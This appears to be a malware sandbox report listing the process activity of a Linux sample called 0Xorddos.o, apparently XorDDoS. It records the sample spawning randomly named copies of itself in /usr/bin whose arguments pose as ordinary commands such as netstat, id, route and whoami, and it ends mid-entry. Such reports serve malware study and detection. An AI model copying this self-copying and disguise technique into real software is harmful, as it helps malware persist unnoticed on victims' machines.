                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:08
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:08
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:08
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:/usr/bin/njezqqgxiu "netstat -an" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:08
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:13
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:13
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:13
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:/usr/bin/wzulpfbuxk id 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:13
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:/usr/bin/wzulpfbuxk ls 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:/usr/bin/wzulpfbuxk "route -n" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:/usr/bin/wzulpfbuxk id 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:15
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:14
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:/usr/bin/wzulpfbuxk gnome-terminal 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:15
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/wzulpfbuxk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:3544260d47adf075442cc29318bed673

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:/usr/bin/aoyymackpm sh 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:/usr/bin/aoyymackpm "netstat -antop" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:/usr/bin/aoyymackpm "echo \"find\"" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:/usr/bin/aoyymackpm gnome-terminal 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:20
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:/usr/bin/aoyymackpm "cat resolv.conf" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:21
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/aoyymackpm
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4b35d88168505669df2e8ba08379e487

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:26
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:26
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:26
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:/usr/bin/gbsknxiwip gnome-terminal 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:/usr/bin/gbsknxiwip "sleep 1" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:/usr/bin/gbsknxiwip "netstat -antop" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:/usr/bin/gbsknxiwip who 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:/usr/bin/gbsknxiwip "cat resolv.conf" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:27
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gbsknxiwip
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:332829866022c2218579e44d63c2dae3

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:/usr/bin/gpcmhoiszu su 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:/usr/bin/gpcmhoiszu bash 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:/usr/bin/gpcmhoiszu ifconfig 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:/usr/bin/gpcmhoiszu su 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:33
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:/usr/bin/gpcmhoiszu whoami 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:34
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/gpcmhoiszu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:2398b188e4ccdfa7852549d00ece9eb7

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:39
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:39
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:39
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/qizbpqmtbi
